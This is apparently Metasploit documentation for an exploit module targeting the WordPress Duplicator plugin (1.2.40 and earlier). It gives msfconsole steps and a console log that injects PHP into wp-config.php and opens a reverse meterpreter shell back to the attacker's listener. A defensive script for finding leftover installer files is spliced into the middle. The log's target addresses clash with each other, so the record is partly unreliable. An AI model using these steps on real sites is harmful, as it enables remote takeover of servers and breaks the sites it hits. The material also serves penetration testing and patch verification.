Duplicator by Snap Creek is a WordPress plugin that can be used to create a complete backup of a WordPress instance and restore it on a fresh server.

The export method generates 2 files:

* A ZIP archive with the complete WordPress files and Duplicator-specific files:
  * A copy of the `installer.php` script: `installer-backup.php`
  * A SQL script that will be used to restore the database content: `database.sql`
* An installer PHP script to restore the archive: `installer.php`

When `installer.php` completes its process, the following files remain in the directory and have to be deleted manually:

* The ZIP archive
* `database.sql`
* `installer-backup.php`
* `installer-data.sql`
* `installer-log.txt`
* `installer.php`

WARNING: exploiting the vulnerability will overwrite the `wp-config.php` file, breaking the WordPress instance.

## Vulnerable application

Install a vulnerable version of [WordPress Duplicator (<= 1.2.40)](https://downloads.wordpress.org/plugin/duplicator.1.2.40.zip) and create a backup. Put the `installer.php` and archive files on a clean web server.

## Verification Steps

Confirm that functionality works:

1. Start `msfconsole`
2. `use exploit/multi/php/wordpress_duplicator`
3. Set the `RHOST`.
4. Run `check` to confirm the target is vulnerable
5. Confirm the output reads `The target is vulnerable.`
6. Set a payload: `set PAYLOAD php/meterpreter/reverse_tcp`
7. Set `LHOST` and `LPORT`
8. Run the exploit: `run`
9. Confirm you now have a meterpreter session

## Options

**TARGETURI**

The path to the `installer.php` file to exploit. By default, the path is `/installer.php`.
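As an added defensive check (not part of this module or its documentation): a POSIX shell function that scans a WordPress document root for the leftover Duplicator files listed above, which are exactly the artefacts this module relies on. The web root path is the only assumption; the `*.zip` match is a heuristic, since the page does not name the archive.

```shell
#!/bin/sh
# Added example: report Duplicator installer artefacts that the plugin leaves
# behind after installer.php finishes and that must be deleted by hand.
# Exit status 1 means at least one artefact is still present.

# Names taken from the list of leftover files above.
DUPLICATOR_LEFTOVERS="installer.php installer-backup.php installer-data.sql installer-log.txt database.sql"

# find_duplicator_leftovers WEBROOT
# Prints one "leftover: <path>" line per artefact found; returns 1 if any.
find_duplicator_leftovers() {
    webroot=$1
    found=0
    for name in $DUPLICATOR_LEFTOVERS; do
        if [ -e "$webroot/$name" ]; then
            printf 'leftover: %s\n' "$webroot/$name"
            found=1
        fi
    done
    # Heuristic (assumption, the page does not name the archive): any ZIP
    # sitting directly in the web root is treated as a possible package archive.
    for archive in "$webroot"/*.zip; do
        [ -e "$archive" ] || continue
        printf 'leftover: %s\n' "$archive"
        found=1
    done
    return $found
}

# Usage: sh check_duplicator.sh /var/www/html
if [ $# -gt 0 ]; then
    find_duplicator_leftovers "$1"
fi
```

Running it from cron against every WordPress document root gives a cheap alarm for an abandoned restore; an empty result and exit status 0 means nothing was found.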
## Scenarios

### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40

```
msf5 > use exploit/multi/php/wordpress_duplicator
msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 1.1.1.1
RHOSTS => 192.168.56.101
msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php
TARGETURI => /installer_vuln.php
msf5 exploit(multi/php/wordpress_duplicator) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Checking if the wp-config.php file already exists...
[*] This WordPress was not restored. Creating the wp-config.php file...
[*] Successfully created the wp-config.php file!
[*] All good! Injecting PHP code in the wp-config.php file...
[*] Requesting wp-config.php to execute the payload...
[*] Sending stage (37775 bytes) to 1.1.1.1
meterpreter > sysinfo
Computer    : debian
OS          : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
Meterpreter : php/linux
```